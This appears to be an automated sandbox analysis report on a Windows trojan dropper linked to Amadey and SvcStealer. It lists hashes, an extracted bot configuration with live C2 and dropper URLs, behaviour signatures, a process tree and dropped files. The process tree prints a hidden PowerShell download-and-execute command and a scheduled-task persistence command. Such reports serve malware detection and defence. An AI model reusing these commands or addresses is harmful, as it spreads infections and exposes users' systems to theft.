Analysis

  • max time kernel
    34s
  • max time network
    46s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/03/2025, 03:56

Errors

Reason
Machine shutdown

General

  • Target

    e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe

  • Size

    938KB

  • MD5

    ef59bfc4e53fa990607868d76f1a9a93

  • SHA1

    07a2dff253bc24e4683898621cd5a9c01af59ea3

  • SHA256

    e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35

  • SHA512

    31fc8c697e3eedc23c2251b95b34fd24f5d58d9dab5cdb9197d7890497c3aad430f15bf4a02d9c6bf39fdf473a1fd49b40700e36951ba6ee18523374191d1664

  • SSDEEP

    24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8a0xu:VTvC/MTQYxsWR7a0x

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects SvcStealer Payload 5 IoCs

    SvcStealer aka Diamotrix Clipper is a stealer/downloader written in C++.

  • SvcStealer, Diamotrix

    SvcStealer aka Diamotrix Clipper is a stealer/downloader written in C++.

  • Svcstealer family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 4 IoCs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3424
    • C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe
      "C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:3436
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2244
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:432
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4820
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4824
          • C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
            "C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:1244
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:4328
              • C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
                "C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe"
                7⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1624
              • C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
                "C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1196
              • C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
                "C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4656
                • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                  "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:864
  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:4980

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE

    Filesize

    1.8MB

    MD5

    3147e388f1f2ad94f26aee55a4267b8c

    SHA1

    b3dfd5bb152b1b8e338586ea1e2d240cde6503b3

    SHA256

    49ac9312c49ff99d5af392d17450747038fcbd6f319ebf981916fcf44120aa2b

    SHA512

    720b48b08c502c153ecdaeb6fa8a2e374187a71655a88493dc70b266fe16ce88d342aaceefbe5a35fa9db93911510baee7fb578786e44ae6da637369f56443e9

  • C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

    Filesize

    615KB

    MD5

    19668940080169c70b830bed8c390783

    SHA1

    5e6b72e52abc7d221d512111e39cbdd3f2ad40c1

    SHA256

    cdbc641b8c23b5699f899b408394ecfc946af9ac7a38c5d44c78a4a938e7b02c

    SHA512

    c322eba01ff4544b8077ec400f15ecffd3b66f89e0e0e26946224771c1ffb9c687ff4adc2e0a5e6b119766b3c8300971cfc2c990ff48346d9d3d514ab5d4bed2

  • C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

    Filesize

    7.6MB

    MD5

    e82c4c3f7a2994eeecc1f81a5e4a4180

    SHA1

    660820f778073332dcd5ec446d2fcf00de887abd

    SHA256

    11eec5d71c7fadae9d7176448d8fff3de44ec8d3b4df86f0eca59e06adf202d3

    SHA512

    4d3e42e68b9fa6330edfee677ad55ae24964c33d6fd2d25ba6c2876d80f8d9cbc999c6e27192ce58a45559d00b3c0bc71ddbee1ad8d6fd7083b705ef5cf84d76

  • C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

    Filesize

    450KB

    MD5

    02579a797e919dcaf5758fbcbe34b093

    SHA1

    7668fff0888f4c7ad7a83b24f8c6d4009c10e534

    SHA256

    0a63a310dfc4ce680c96f72f5b9c9559f9e6d9c3d99f48c8782ee43c56a8728c

    SHA512

    2b99b620ca06f03a1924c0ab2feef96142df6ff16558d30c37e8b3e5602e5d5b2ecd4e7bd3b4499ef64a0eb32cb136821442e79b3aa66caf42467c749116e5f5

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vad1iwme.c10.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta

    Filesize

    717B

    MD5

    42bcecbc4a9d0c9e72120f0a60102147

    SHA1

    026d375bc2a684027fb8532af83ce2991509e1f1

    SHA256

    303332f5d6160d3604c26f26245225fcdb46887b69f741b346b35948cbb1b23b

    SHA512

    d6438e784658959e18c3b867bac7e406131011dc5146db4ce9781469e4cabee4630dd6b79106b7b507fe03e748a51516855dcae59f4ac0b2ab29416f339c4498

  • memory/1244-48-0x0000000000400000-0x000000000089F000-memory.dmp

    Filesize

    4.6MB

  • memory/1244-32-0x0000000000400000-0x000000000089F000-memory.dmp

    Filesize

    4.6MB

  • memory/1624-63-0x00007FF615DB0000-0x00007FF615E4F000-memory.dmp

    Filesize

    636KB

  • memory/1624-68-0x00007FF615DB0000-0x00007FF615E4F000-memory.dmp

    Filesize

    636KB

  • memory/3424-64-0x00000000091C0000-0x0000000009265000-memory.dmp

    Filesize

    660KB

  • memory/3424-65-0x00000000091C0000-0x0000000009265000-memory.dmp

    Filesize

    660KB

  • memory/4328-69-0x0000000000230000-0x00000000006CF000-memory.dmp

    Filesize

    4.6MB

  • memory/4328-70-0x0000000000230000-0x00000000006CF000-memory.dmp

    Filesize

    4.6MB

  • memory/4328-46-0x0000000000230000-0x00000000006CF000-memory.dmp

    Filesize

    4.6MB

  • memory/4328-92-0x0000000000230000-0x00000000006CF000-memory.dmp

    Filesize

    4.6MB

  • memory/4824-16-0x0000000005B50000-0x0000000005EA4000-memory.dmp

    Filesize

    3.3MB

  • memory/4824-17-0x0000000006040000-0x000000000605E000-memory.dmp

    Filesize

    120KB

  • memory/4824-23-0x0000000007530000-0x0000000007552000-memory.dmp

    Filesize

    136KB

  • memory/4824-22-0x00000000075A0000-0x0000000007636000-memory.dmp

    Filesize

    600KB

  • memory/4824-20-0x0000000006580000-0x000000000659A000-memory.dmp

    Filesize

    104KB

  • memory/4824-19-0x0000000007780000-0x0000000007DFA000-memory.dmp

    Filesize

    6.5MB

  • memory/4824-18-0x0000000006090000-0x00000000060DC000-memory.dmp

    Filesize

    304KB

  • memory/4824-24-0x00000000083B0000-0x0000000008954000-memory.dmp

    Filesize

    5.6MB

  • memory/4824-6-0x00000000059E0000-0x0000000005A46000-memory.dmp

    Filesize

    408KB

  • memory/4824-5-0x0000000005970000-0x00000000059D6000-memory.dmp

    Filesize

    408KB

  • memory/4824-4-0x00000000051A0000-0x00000000051C2000-memory.dmp

    Filesize

    136KB

  • memory/4824-2-0x0000000002A60000-0x0000000002A96000-memory.dmp

    Filesize

    216KB

  • memory/4824-3-0x0000000005210000-0x0000000005838000-memory.dmp

    Filesize

    6.2MB

  • memory/4980-91-0x0000000000230000-0x00000000006CF000-memory.dmp

    Filesize

    4.6MB

  • memory/4980-89-0x0000000000230000-0x00000000006CF000-memory.dmp

    Filesize

    4.6MB